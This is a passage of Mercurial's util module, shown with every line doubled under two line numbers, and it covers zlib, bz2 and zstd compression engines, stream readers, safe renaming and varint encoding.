3444 return the bytes used to identify chunks compressed with this engine.
3445 Else, the method should return ``None`` to indicate it does not
3445 Else, the method should return ``None`` to indicate it does not
3446 participate in revlog compression.
3446 participate in revlog compression.
3447 """
3447 """
3448 return None
3448 return None
3449
3449
3450 def compressstream(self, it, opts=None):
3450 def compressstream(self, it, opts=None):
3451 """Compress an iterator of chunks.
3451 """Compress an iterator of chunks.
3452
3452
3453 The method receives an iterator (ideally a generator) of chunks of
3453 The method receives an iterator (ideally a generator) of chunks of
3454 bytes to be compressed. It returns an iterator (ideally a generator)
3454 bytes to be compressed. It returns an iterator (ideally a generator)
3455 of bytes of chunks representing the compressed output.
3455 of bytes of chunks representing the compressed output.
3456
3456
3457 Optionally accepts an argument defining how to perform compression.
3457 Optionally accepts an argument defining how to perform compression.
3458 Each engine treats this argument differently.
3458 Each engine treats this argument differently.
3459 """
3459 """
3460 raise NotImplementedError()
3460 raise NotImplementedError()
3461
3461
3462 def decompressorreader(self, fh):
3462 def decompressorreader(self, fh):
3463 """Perform decompression on a file object.
3463 """Perform decompression on a file object.
3464
3464
3465 Argument is an object with a ``read(size)`` method that returns
3465 Argument is an object with a ``read(size)`` method that returns
3466 compressed data. Return value is an object with a ``read(size)`` that
3466 compressed data. Return value is an object with a ``read(size)`` that
3467 returns uncompressed data.
3467 returns uncompressed data.
3468 """
3468 """
3469 raise NotImplementedError()
3469 raise NotImplementedError()
3470
3470
3471 def revlogcompressor(self, opts=None):
3471 def revlogcompressor(self, opts=None):
3472 """Obtain an object that can be used to compress revlog entries.
3472 """Obtain an object that can be used to compress revlog entries.
3473
3473
3474 The object has a ``compress(data)`` method that compresses binary
3474 The object has a ``compress(data)`` method that compresses binary
3475 data. This method returns compressed binary data or ``None`` if
3475 data. This method returns compressed binary data or ``None`` if
3476 the data could not be compressed (too small, not compressible, etc).
3476 the data could not be compressed (too small, not compressible, etc).
3477 The returned data should have a header uniquely identifying this
3477 The returned data should have a header uniquely identifying this
3478 compression format so decompression can be routed to this engine.
3478 compression format so decompression can be routed to this engine.
3479 This header should be identified by the ``revlogheader()`` return
3479 This header should be identified by the ``revlogheader()`` return
3480 value.
3480 value.
3481
3481
3482 The object has a ``decompress(data)`` method that decompresses
3482 The object has a ``decompress(data)`` method that decompresses
3483 data. The method will only be called if ``data`` begins with
3483 data. The method will only be called if ``data`` begins with
3484 ``revlogheader()``. The method should return the raw, uncompressed
3484 ``revlogheader()``. The method should return the raw, uncompressed
3485 data or raise a ``StorageError``.
3485 data or raise a ``StorageError``.
3486
3486
3487 The object is reusable but is not thread safe.
3487 The object is reusable but is not thread safe.
3488 """
3488 """
3489 raise NotImplementedError()
3489 raise NotImplementedError()
3490
3490
3491 class _CompressedStreamReader(object):
3491 class _CompressedStreamReader(object):
3492 def __init__(self, fh):
3492 def __init__(self, fh):
3493 if safehasattr(fh, 'unbufferedread'):
3493 if safehasattr(fh, 'unbufferedread'):
3494 self._reader = fh.unbufferedread
3494 self._reader = fh.unbufferedread
3495 else:
3495 else:
3496 self._reader = fh.read
3496 self._reader = fh.read
3497 self._pending = []
3497 self._pending = []
3498 self._pos = 0
3498 self._pos = 0
3499 self._eof = False
3499 self._eof = False
3500
3500
3501 def _decompress(self, chunk):
3501 def _decompress(self, chunk):
3502 raise NotImplementedError()
3502 raise NotImplementedError()
3503
3503
3504 def read(self, l):
3504 def read(self, l):
3505 buf = []
3505 buf = []
3506 while True:
3506 while True:
3507 while self._pending:
3507 while self._pending:
3508 if len(self._pending[0]) > l + self._pos:
3508 if len(self._pending[0]) > l + self._pos:
3509 newbuf = self._pending[0]
3509 newbuf = self._pending[0]
3510 buf.append(newbuf[self._pos:self._pos + l])
3510 buf.append(newbuf[self._pos:self._pos + l])
3511 self._pos += l
3511 self._pos += l
3512 return ''.join(buf)
3512 return ''.join(buf)
3513
3513
3514 newbuf = self._pending.pop(0)
3514 newbuf = self._pending.pop(0)
3515 if self._pos:
3515 if self._pos:
3516 buf.append(newbuf[self._pos:])
3516 buf.append(newbuf[self._pos:])
3517 l -= len(newbuf) - self._pos
3517 l -= len(newbuf) - self._pos
3518 else:
3518 else:
3519 buf.append(newbuf)
3519 buf.append(newbuf)
3520 l -= len(newbuf)
3520 l -= len(newbuf)
3521 self._pos = 0
3521 self._pos = 0
3522
3522
3523 if self._eof:
3523 if self._eof:
3524 return ''.join(buf)
3524 return ''.join(buf)
3525 chunk = self._reader(65536)
3525 chunk = self._reader(65536)
3526 self._decompress(chunk)
3526 self._decompress(chunk)
3527 if not chunk and not self._pending and not self._eof:
3527 if not chunk and not self._pending and not self._eof:
3528 # No progress and no new data, bail out
3528 # No progress and no new data, bail out
3529 return ''.join(buf)
3529 return ''.join(buf)
3530
3530
3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3532 def __init__(self, fh):
3532 def __init__(self, fh):
3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3534 self._decompobj = zlib.decompressobj()
3534 self._decompobj = zlib.decompressobj()
3535 def _decompress(self, chunk):
3535 def _decompress(self, chunk):
3536 newbuf = self._decompobj.decompress(chunk)
3536 newbuf = self._decompobj.decompress(chunk)
3537 if newbuf:
3537 if newbuf:
3538 self._pending.append(newbuf)
3538 self._pending.append(newbuf)
3539 d = self._decompobj.copy()
3539 d = self._decompobj.copy()
3540 try:
3540 try:
3541 d.decompress('x')
3541 d.decompress('x')
3542 d.flush()
3542 d.flush()
3543 if d.unused_data == 'x':
3543 if d.unused_data == 'x':
3544 self._eof = True
3544 self._eof = True
3545 except zlib.error:
3545 except zlib.error:
3546 pass
3546 pass
3547
3547
3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3549 def __init__(self, fh):
3549 def __init__(self, fh):
3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3551 self._decompobj = bz2.BZ2Decompressor()
3551 self._decompobj = bz2.BZ2Decompressor()
3552 def _decompress(self, chunk):
3552 def _decompress(self, chunk):
3553 newbuf = self._decompobj.decompress(chunk)
3553 newbuf = self._decompobj.decompress(chunk)
3554 if newbuf:
3554 if newbuf:
3555 self._pending.append(newbuf)
3555 self._pending.append(newbuf)
3556 try:
3556 try:
3557 while True:
3557 while True:
3558 newbuf = self._decompobj.decompress('')
3558 newbuf = self._decompobj.decompress('')
3559 if newbuf:
3559 if newbuf:
3560 self._pending.append(newbuf)
3560 self._pending.append(newbuf)
3561 else:
3561 else:
3562 break
3562 break
3563 except EOFError:
3563 except EOFError:
3564 self._eof = True
3564 self._eof = True
3565
3565
3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3567 def __init__(self, fh):
3567 def __init__(self, fh):
3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3569 newbuf = self._decompobj.decompress('BZ')
3569 newbuf = self._decompobj.decompress('BZ')
3570 if newbuf:
3570 if newbuf:
3571 self._pending.append(newbuf)
3571 self._pending.append(newbuf)
3572
3572
3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3574 def __init__(self, fh, zstd):
3574 def __init__(self, fh, zstd):
3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3576 self._zstd = zstd
3576 self._zstd = zstd
3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3578 def _decompress(self, chunk):
3578 def _decompress(self, chunk):
3579 newbuf = self._decompobj.decompress(chunk)
3579 newbuf = self._decompobj.decompress(chunk)
3580 if newbuf:
3580 if newbuf:
3581 self._pending.append(newbuf)
3581 self._pending.append(newbuf)
3582 try:
3582 try:
3583 while True:
3583 while True:
3584 newbuf = self._decompobj.decompress('')
3584 newbuf = self._decompobj.decompress('')
3585 if newbuf:
3585 if newbuf:
3586 self._pending.append(newbuf)
3586 self._pending.append(newbuf)
3587 else:
3587 else:
3588 break
3588 break
3589 except self._zstd.ZstdError:
3589 except self._zstd.ZstdError:
3590 self._eof = True
3590 self._eof = True
3591
3591
3592 class _zlibengine(compressionengine):
3592 class _zlibengine(compressionengine):
3593 def name(self):
3593 def name(self):
3594 return 'zlib'
3594 return 'zlib'
3595
3595
3596 def bundletype(self):
3596 def bundletype(self):
3597 """zlib compression using the DEFLATE algorithm.
3597 """zlib compression using the DEFLATE algorithm.
3598
3598
3599 All Mercurial clients should support this format. The compression
3599 All Mercurial clients should support this format. The compression
3600 algorithm strikes a reasonable balance between compression ratio
3600 algorithm strikes a reasonable balance between compression ratio
3601 and size.
3601 and size.
3602 """
3602 """
3603 return 'gzip', 'GZ'
3603 return 'gzip', 'GZ'
3604
3604
3605 def wireprotosupport(self):
3605 def wireprotosupport(self):
3606 return compewireprotosupport('zlib', 20, 20)
3606 return compewireprotosupport('zlib', 20, 20)
3607
3607
3608 def revlogheader(self):
3608 def revlogheader(self):
3609 return 'x'
3609 return 'x'
3610
3610
3611 def compressstream(self, it, opts=None):
3611 def compressstream(self, it, opts=None):
3612 opts = opts or {}
3612 opts = opts or {}
3613
3613
3614 z = zlib.compressobj(opts.get('level', -1))
3614 z = zlib.compressobj(opts.get('level', -1))
3615 for chunk in it:
3615 for chunk in it:
3616 data = z.compress(chunk)
3616 data = z.compress(chunk)
3617 # Not all calls to compress emit data. It is cheaper to inspect
3617 # Not all calls to compress emit data. It is cheaper to inspect
3618 # here than to feed empty chunks through generator.
3618 # here than to feed empty chunks through generator.
3619 if data:
3619 if data:
3620 yield data
3620 yield data
3621
3621
3622 yield z.flush()
3622 yield z.flush()
3623
3623
3624 def decompressorreader(self, fh):
3624 def decompressorreader(self, fh):
3625 return _GzipCompressedStreamReader(fh)
3625 return _GzipCompressedStreamReader(fh)
3626
3626
3627 class zlibrevlogcompressor(object):
3627 class zlibrevlogcompressor(object):
3628 def compress(self, data):
3628 def compress(self, data):
3629 insize = len(data)
3629 insize = len(data)
3630 # Caller handles empty input case.
3630 # Caller handles empty input case.
3631 assert insize > 0
3631 assert insize > 0
3632
3632
3633 if insize < 44:
3633 if insize < 44:
3634 return None
3634 return None
3635
3635
3636 elif insize <= 1000000:
3636 elif insize <= 1000000:
3637 compressed = zlib.compress(data)
3637 compressed = zlib.compress(data)
3638 if len(compressed) < insize:
3638 if len(compressed) < insize:
3639 return compressed
3639 return compressed
3640 return None
3640 return None
3641
3641
3642 # zlib makes an internal copy of the input buffer, doubling
3642 # zlib makes an internal copy of the input buffer, doubling
3643 # memory usage for large inputs. So do streaming compression
3643 # memory usage for large inputs. So do streaming compression
3644 # on large inputs.
3644 # on large inputs.
3645 else:
3645 else:
3646 z = zlib.compressobj()
3646 z = zlib.compressobj()
3647 parts = []
3647 parts = []
3648 pos = 0
3648 pos = 0
3649 while pos < insize:
3649 while pos < insize:
3650 pos2 = pos + 2**20
3650 pos2 = pos + 2**20
3651 parts.append(z.compress(data[pos:pos2]))
3651 parts.append(z.compress(data[pos:pos2]))
3652 pos = pos2
3652 pos = pos2
3653 parts.append(z.flush())
3653 parts.append(z.flush())
3654
3654
3655 if sum(map(len, parts)) < insize:
3655 if sum(map(len, parts)) < insize:
3656 return ''.join(parts)
3656 return ''.join(parts)
3657 return None
3657 return None
3658
3658
3659 def decompress(self, data):
3659 def decompress(self, data):
3660 try:
3660 try:
3661 return zlib.decompress(data)
3661 return zlib.decompress(data)
3662 except zlib.error as e:
3662 except zlib.error as e:
3663 raise error.StorageError(_('revlog decompress error: %s') %
3663 raise error.StorageError(_('revlog decompress error: %s') %
3664 stringutil.forcebytestr(e))
3664 stringutil.forcebytestr(e))
3665
3665
3666 def revlogcompressor(self, opts=None):
3666 def revlogcompressor(self, opts=None):
3667 return self.zlibrevlogcompressor()
3667 return self.zlibrevlogcompressor()
3668
3668
3669 compengines.register(_zlibengine())
3669 compengines.register(_zlibengine())
3670
3670
3671 class _bz2engine(compressionengine):
3671 class _bz2engine(compressionengine):
3672 def name(self):
3672 def name(self):
3673 return 'bz2'
3673 return 'bz2'
3674
3674
3675 def bundletype(self):
3675 def bundletype(self):
3676 """An algorithm that produces smaller bundles than ``gzip``.
3676 """An algorithm that produces smaller bundles than ``gzip``.
3677
3677
3678 All Mercurial clients should support this format.
3678 All Mercurial clients should support this format.
3679
3679
3680 This engine will likely produce smaller bundles than ``gzip`` but
3680 This engine will likely produce smaller bundles than ``gzip`` but
3681 will be significantly slower, both during compression and
3681 will be significantly slower, both during compression and
3682 decompression.
3682 decompression.
3683
3683
3684 If available, the ``zstd`` engine can yield similar or better
3684 If available, the ``zstd`` engine can yield similar or better
3685 compression at much higher speeds.
3685 compression at much higher speeds.
3686 """
3686 """
3687 return 'bzip2', 'BZ'
3687 return 'bzip2', 'BZ'
3688
3688
3689 # We declare a protocol name but don't advertise by default because
3689 # We declare a protocol name but don't advertise by default because
3690 # it is slow.
3690 # it is slow.
3691 def wireprotosupport(self):
3691 def wireprotosupport(self):
3692 return compewireprotosupport('bzip2', 0, 0)
3692 return compewireprotosupport('bzip2', 0, 0)
3693
3693
3694 def compressstream(self, it, opts=None):
3694 def compressstream(self, it, opts=None):
3695 opts = opts or {}
3695 opts = opts or {}
3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3697 for chunk in it:
3697 for chunk in it:
3698 data = z.compress(chunk)
3698 data = z.compress(chunk)
3699 if data:
3699 if data:
3700 yield data
3700 yield data
3701
3701
3702 yield z.flush()
3702 yield z.flush()
3703
3703
3704 def decompressorreader(self, fh):
3704 def decompressorreader(self, fh):
3705 return _BZ2CompressedStreamReader(fh)
3705 return _BZ2CompressedStreamReader(fh)
3706
3706
3707 compengines.register(_bz2engine())
3707 compengines.register(_bz2engine())
3708
3708
3709 class _truncatedbz2engine(compressionengine):
3709 class _truncatedbz2engine(compressionengine):
3710 def name(self):
3710 def name(self):
3711 return 'bz2truncated'
3711 return 'bz2truncated'
3712
3712
3713 def bundletype(self):
3713 def bundletype(self):
3714 return None, '_truncatedBZ'
3714 return None, '_truncatedBZ'
3715
3715
3716 # We don't implement compressstream because it is hackily handled elsewhere.
3716 # We don't implement compressstream because it is hackily handled elsewhere.
3717
3717
3718 def decompressorreader(self, fh):
3718 def decompressorreader(self, fh):
3719 return _TruncatedBZ2CompressedStreamReader(fh)
3719 return _TruncatedBZ2CompressedStreamReader(fh)
3720
3720
3721 compengines.register(_truncatedbz2engine())
3721 compengines.register(_truncatedbz2engine())
3722
3722
3723 class _noopengine(compressionengine):
3723 class _noopengine(compressionengine):
3724 def name(self):
3724 def name(self):
3725 return 'none'
3725 return 'none'
3726
3726
3727 def bundletype(self):
3727 def bundletype(self):
3728 """No compression is performed.
3728 """No compression is performed.
3729
3729
3730 Use this compression engine to explicitly disable compression.
3730 Use this compression engine to explicitly disable compression.
3731 """
3731 """
3732 return 'none', 'UN'
3732 return 'none', 'UN'
3733
3733
3734 # Clients always support uncompressed payloads. Servers don't because
3734 # Clients always support uncompressed payloads. Servers don't because
3735 # unless you are on a fast network, uncompressed payloads can easily
3735 # unless you are on a fast network, uncompressed payloads can easily
3736 # saturate your network pipe.
3736 # saturate your network pipe.
3737 def wireprotosupport(self):
3737 def wireprotosupport(self):
3738 return compewireprotosupport('none', 0, 10)
3738 return compewireprotosupport('none', 0, 10)
3739
3739
3740 # We don't implement revlogheader because it is handled specially
3740 # We don't implement revlogheader because it is handled specially
3741 # in the revlog class.
3741 # in the revlog class.
3742
3742
3743 def compressstream(self, it, opts=None):
3743 def compressstream(self, it, opts=None):
3744 return it
3744 return it
3745
3745
3746 def decompressorreader(self, fh):
3746 def decompressorreader(self, fh):
3747 return fh
3747 return fh
3748
3748
3749 class nooprevlogcompressor(object):
3749 class nooprevlogcompressor(object):
3750 def compress(self, data):
3750 def compress(self, data):
3751 return None
3751 return None
3752
3752
3753 def revlogcompressor(self, opts=None):
3753 def revlogcompressor(self, opts=None):
3754 return self.nooprevlogcompressor()
3754 return self.nooprevlogcompressor()
3755
3755
3756 compengines.register(_noopengine())
3756 compengines.register(_noopengine())
3757
3757
3758 class _zstdengine(compressionengine):
3758 class _zstdengine(compressionengine):
3759 def name(self):
3759 def name(self):
3760 return 'zstd'
3760 return 'zstd'
3761
3761
3762 @propertycache
3762 @propertycache
3763 def _module(self):
3763 def _module(self):
3764 # Not all installs have the zstd module available. So defer importing
3764 # Not all installs have the zstd module available. So defer importing
3765 # until first access.
3765 # until first access.
3766 try:
3766 try:
3767 from . import zstd
3767 from . import zstd
3768 # Force delayed import.
3768 # Force delayed import.
3769 zstd.__version__
3769 zstd.__version__
3770 return zstd
3770 return zstd
3771 except ImportError:
3771 except ImportError:
3772 return None
3772 return None
3773
3773
3774 def available(self):
3774 def available(self):
3775 return bool(self._module)
3775 return bool(self._module)
3776
3776
3777 def bundletype(self):
3777 def bundletype(self):
3778 """A modern compression algorithm that is fast and highly flexible.
3778 """A modern compression algorithm that is fast and highly flexible.
3779
3779
3780 Only supported by Mercurial 4.1 and newer clients.
3780 Only supported by Mercurial 4.1 and newer clients.
3781
3781
3782 With the default settings, zstd compression is both faster and yields
3782 With the default settings, zstd compression is both faster and yields
3783 better compression than ``gzip``. It also frequently yields better
3783 better compression than ``gzip``. It also frequently yields better
3784 compression than ``bzip2`` while operating at much higher speeds.
3784 compression than ``bzip2`` while operating at much higher speeds.
3785
3785
3786 If this engine is available and backwards compatibility is not a
3786 If this engine is available and backwards compatibility is not a
3787 concern, it is likely the best available engine.
3787 concern, it is likely the best available engine.
3788 """
3788 """
3789 return 'zstd', 'ZS'
3789 return 'zstd', 'ZS'
3790
3790
3791 def wireprotosupport(self):
3791 def wireprotosupport(self):
3792 return compewireprotosupport('zstd', 50, 50)
3792 return compewireprotosupport('zstd', 50, 50)
3793
3793
3794 def revlogheader(self):
3794 def revlogheader(self):
3795 return '\x28'
3795 return '\x28'
3796
3796
3797 def compressstream(self, it, opts=None):
3797 def compressstream(self, it, opts=None):
3798 opts = opts or {}
3798 opts = opts or {}
3799 # zstd level 3 is almost always significantly faster than zlib
3799 # zstd level 3 is almost always significantly faster than zlib
3800 # while providing no worse compression. It strikes a good balance
3800 # while providing no worse compression. It strikes a good balance
3801 # between speed and compression.
3801 # between speed and compression.
3802 level = opts.get('level', 3)
3802 level = opts.get('level', 3)
3803
3803
3804 zstd = self._module
3804 zstd = self._module
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3806 for chunk in it:
3806 for chunk in it:
3807 data = z.compress(chunk)
3807 data = z.compress(chunk)
3808 if data:
3808 if data:
3809 yield data
3809 yield data
3810
3810
3811 yield z.flush()
3811 yield z.flush()
3812
3812
3813 def decompressorreader(self, fh):
3813 def decompressorreader(self, fh):
3814 return _ZstdCompressedStreamReader(fh, self._module)
3814 return _ZstdCompressedStreamReader(fh, self._module)
3815
3815
3816 class zstdrevlogcompressor(object):
3816 class zstdrevlogcompressor(object):
3817 def __init__(self, zstd, level=3):
3817 def __init__(self, zstd, level=3):
3818 # TODO consider omitting frame magic to save 4 bytes.
3818 # TODO consider omitting frame magic to save 4 bytes.
3819 # This writes content sizes into the frame header. That is
3819 # This writes content sizes into the frame header. That is
3820 # extra storage. But it allows a correct size memory allocation
3820 # extra storage. But it allows a correct size memory allocation
3821 # to hold the result.
3821 # to hold the result.
3822 self._cctx = zstd.ZstdCompressor(level=level)
3822 self._cctx = zstd.ZstdCompressor(level=level)
3823 self._dctx = zstd.ZstdDecompressor()
3823 self._dctx = zstd.ZstdDecompressor()
3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3826
3826
3827 def compress(self, data):
3827 def compress(self, data):
3828 insize = len(data)
3828 insize = len(data)
3829 # Caller handles empty input case.
3829 # Caller handles empty input case.
3830 assert insize > 0
3830 assert insize > 0
3831
3831
3832 if insize < 50:
3832 if insize < 50:
3833 return None
3833 return None
3834
3834
3835 elif insize <= 1000000:
3835 elif insize <= 1000000:
3836 compressed = self._cctx.compress(data)
3836 compressed = self._cctx.compress(data)
3837 if len(compressed) < insize:
3837 if len(compressed) < insize:
3838 return compressed
3838 return compressed
3839 return None
3839 return None
3840 else:
3840 else:
3841 z = self._cctx.compressobj()
3841 z = self._cctx.compressobj()
3842 chunks = []
3842 chunks = []
3843 pos = 0
3843 pos = 0
3844 while pos < insize:
3844 while pos < insize:
3845 pos2 = pos + self._compinsize
3845 pos2 = pos + self._compinsize
3846 chunk = z.compress(data[pos:pos2])
3846 chunk = z.compress(data[pos:pos2])
3847 if chunk:
3847 if chunk:
3848 chunks.append(chunk)
3848 chunks.append(chunk)
3849 pos = pos2
3849 pos = pos2
3850 chunks.append(z.flush())
3850 chunks.append(z.flush())
3851
3851
3852 if sum(map(len, chunks)) < insize:
3852 if sum(map(len, chunks)) < insize:
3853 return ''.join(chunks)
3853 return ''.join(chunks)
3854 return None
3854 return None
3855
3855
3856 def decompress(self, data):
3856 def decompress(self, data):
3857 insize = len(data)
3857 insize = len(data)
3858
3858
3859 try:
3859 try:
3860 # This was measured to be faster than other streaming
3860 # This was measured to be faster than other streaming
3861 # decompressors.
3861 # decompressors.
3862 dobj = self._dctx.decompressobj()
3862 dobj = self._dctx.decompressobj()
3863 chunks = []
3863 chunks = []
3864 pos = 0
3864 pos = 0
3865 while pos < insize:
3865 while pos < insize:
3866 pos2 = pos + self._decompinsize
3866 pos2 = pos + self._decompinsize
3867 chunk = dobj.decompress(data[pos:pos2])
3867 chunk = dobj.decompress(data[pos:pos2])
3868 if chunk:
3868 if chunk:
3869 chunks.append(chunk)
3869 chunks.append(chunk)
3870 pos = pos2
3870 pos = pos2
3871 # Frame should be exhausted, so no finish() API.
3871 # Frame should be exhausted, so no finish() API.
3872
3872
3873 return ''.join(chunks)
3873 return ''.join(chunks)
3874 except Exception as e:
3874 except Exception as e:
3875 raise error.StorageError(_('revlog decompress error: %s') %
3875 raise error.StorageError(_('revlog decompress error: %s') %
3876 stringutil.forcebytestr(e))
3876 stringutil.forcebytestr(e))
3877
3877
3878 def revlogcompressor(self, opts=None):
3878 def revlogcompressor(self, opts=None):
3879 opts = opts or {}
3879 opts = opts or {}
3880 return self.zstdrevlogcompressor(self._module,
3880 return self.zstdrevlogcompressor(self._module,
3881 level=opts.get('level', 3))
3881 level=opts.get('level', 3))
3882
3882
3883 compengines.register(_zstdengine())
3883 compengines.register(_zstdengine())
3884
3884
3885 def bundlecompressiontopics():
3885 def bundlecompressiontopics():
3886 """Obtains a list of available bundle compressions for use in help."""
3886 """Obtains a list of available bundle compressions for use in help."""
3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3888 items = {}
3888 items = {}
3889
3889
3890 # We need to format the docstring. So use a dummy object/type to hold it
3890 # We need to format the docstring. So use a dummy object/type to hold it
3891 # rather than mutating the original.
3891 # rather than mutating the original.
3892 class docobject(object):
3892 class docobject(object):
3893 pass
3893 pass
3894
3894
3895 for name in compengines:
3895 for name in compengines:
3896 engine = compengines[name]
3896 engine = compengines[name]
3897
3897
3898 if not engine.available():
3898 if not engine.available():
3899 continue
3899 continue
3900
3900
3901 bt = engine.bundletype()
3901 bt = engine.bundletype()
3902 if not bt or not bt[0]:
3902 if not bt or not bt[0]:
3903 continue
3903 continue
3904
3904
3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3906
3906
3907 value = docobject()
3907 value = docobject()
3908 value.__doc__ = pycompat.sysstr(doc)
3908 value.__doc__ = pycompat.sysstr(doc)
3909 value._origdoc = engine.bundletype.__doc__
3909 value._origdoc = engine.bundletype.__doc__
3910 value._origfunc = engine.bundletype
3910 value._origfunc = engine.bundletype
3911
3911
3912 items[bt[0]] = value
3912 items[bt[0]] = value
3913
3913
3914 return items
3914 return items
3915
3915
3916 i18nfunctions = bundlecompressiontopics().values()
3916 i18nfunctions = bundlecompressiontopics().values()
3917
3917
3918 # convenient shortcut
3918 # convenient shortcut
3919 dst = debugstacktrace
3919 dst = debugstacktrace
3920
3920
3921 def safename(f, tag, ctx, others=None):
3921 def safename(f, tag, ctx, others=None):
3922 """
3922 """
3923 Generate a name that it is safe to rename f to in the given context.
3923 Generate a name that it is safe to rename f to in the given context.
3924
3924
3925 f: filename to rename
3925 f: filename to rename
3926 tag: a string tag that will be included in the new name
3926 tag: a string tag that will be included in the new name
3927 ctx: a context, in which the new name must not exist
3927 ctx: a context, in which the new name must not exist
3928 others: a set of other filenames that the new name must not be in
3928 others: a set of other filenames that the new name must not be in
3929
3929
3930 Returns a file name of the form oldname~tag[~number] which does not exist
3930 Returns a file name of the form oldname~tag[~number] which does not exist
3931 in the provided context and is not in the set of other names.
3931 in the provided context and is not in the set of other names.
3932 """
3932 """
3933 if others is None:
3933 if others is None:
3934 others = set()
3934 others = set()
3935
3935
3936 fn = '%s~%s' % (f, tag)
3936 fn = '%s~%s' % (f, tag)
3937 if fn not in ctx and fn not in others:
3937 if fn not in ctx and fn not in others:
3938 return fn
3938 return fn
3939 for n in itertools.count(1):
3939 for n in itertools.count(1):
3940 fn = '%s~%s~%s' % (f, tag, n)
3940 fn = '%s~%s~%s' % (f, tag, n)
3941 if fn not in ctx and fn not in others:
3941 if fn not in ctx and fn not in others:
3942 return fn
3942 return fn
3943
3943
3944 def readexactly(stream, n):
3944 def readexactly(stream, n):
3945 '''read n bytes from stream.read and abort if less was available'''
3945 '''read n bytes from stream.read and abort if less was available'''
3946 s = stream.read(n)
3946 s = stream.read(n)
3947 if len(s) < n:
3947 if len(s) < n:
3948 raise error.Abort(_("stream ended unexpectedly"
3948 raise error.Abort(_("stream ended unexpectedly"
3949 " (got %d bytes, expected %d)")
3949 " (got %d bytes, expected %d)")
3950 % (len(s), n))
3950 % (len(s), n))
3951 return s
3951 return s
3952
3952
3953 def uvarintencode(value):
3953 def uvarintencode(value):
3954 """Encode an unsigned integer value to a varint.
3954 """Encode an unsigned integer value to a varint.
3955
3955
3956 A varint is a variable length integer of 1 or more bytes. Each byte
3956 A varint is a variable length integer of 1 or more bytes. Each byte
3957 except the last has the most significant bit set. The lower 7 bits of
3957 except the last has the most significant bit set. The lower 7 bits of
3958 each byte store the 2's complement representation, least significant group
3958 each byte store the 2's complement representation, least significant group
3959 first.
3959 first.
3960
3960
3961 >>> uvarintencode(0)
3961 >>> uvarintencode(0)
3962 '\\x00'
3962 '\\x00'
3963 >>> uvarintencode(1)
3963 >>> uvarintencode(1)
3964 '\\x01'
3964 '\\x01'
3965 >>> uvarintencode(127)
3965 >>> uvarintencode(127)
3966 '\\x7f'
3966 '\\x7f'
3967 >>> uvarintencode(1337)
3967 >>> uvarintencode(1337)
3968 '\\xb9\\n'
3968 '\\xb9\\n'
3969 >>> uvarintencode(65536)
3969 >>> uvarintencode(65536)
3970 '\\x80\\x80\\x04'
3970 '\\x80\\x80\\x04'
3971 >>> uvarintencode(-1)
3971 >>> uvarintencode(-1)
3972 Traceback (most recent call last):
3972 Traceback (most recent call last):
3973 ...
3973 ...
3974 ProgrammingError: negative value for uvarint: -1
3974 ProgrammingError: negative value for uvarint: -1
3975 """
3975 """
3976 if value < 0:
3976 if value < 0:
3977 raise error.ProgrammingError('negative value for uvarint: %d'
3977 raise error.ProgrammingError('negative value for uvarint: %d'
3978 % value)
3978 % value)
3979 bits = value & 0x7f
3979 bits = value & 0x7f
3980 value >>= 7
3980 value >>= 7
3981 bytes = []
3981 bytes = []
3982 while value:
3982 while value:
3983 bytes.append(pycompat.bytechr(0x80 | bits))
3983 bytes.append(pycompat.bytechr(0x80 | bits))
3984 bits = value & 0x7f
3984 bits = value & 0x7f
3985 value >>= 7
3985 value >>= 7
3986 bytes.append(pycompat.bytechr(bits))
3986 bytes.append(pycompat.bytechr(bits))
3987
3987
3988 return ''.join(bytes)
3988 return ''.join(bytes)
3989
3989
3990 def uvarintdecodestream(fh):
3990 def uvarintdecodestream(fh):
3991 """Decode an unsigned variable length integer from a stream.
3991 """Decode an unsigned variable length integer from a stream.
3992
3992
3993 The passed argument is anything that has a ``.read(N)`` method.
3993 The passed argument is anything that has a ``.read(N)`` method.
3994
3994
3995 >>> try:
3995 >>> try:
3996 ... from StringIO import StringIO as BytesIO
3996 ... from StringIO import StringIO as BytesIO
3997 ... except ImportError:
3997 ... except ImportError:
3998 ... from io import BytesIO
3998 ... from io import BytesIO
3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4000 0
4000 0
4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4002 1
4002 1
4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4004 127
4004 127
4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4006 1337
4006 1337
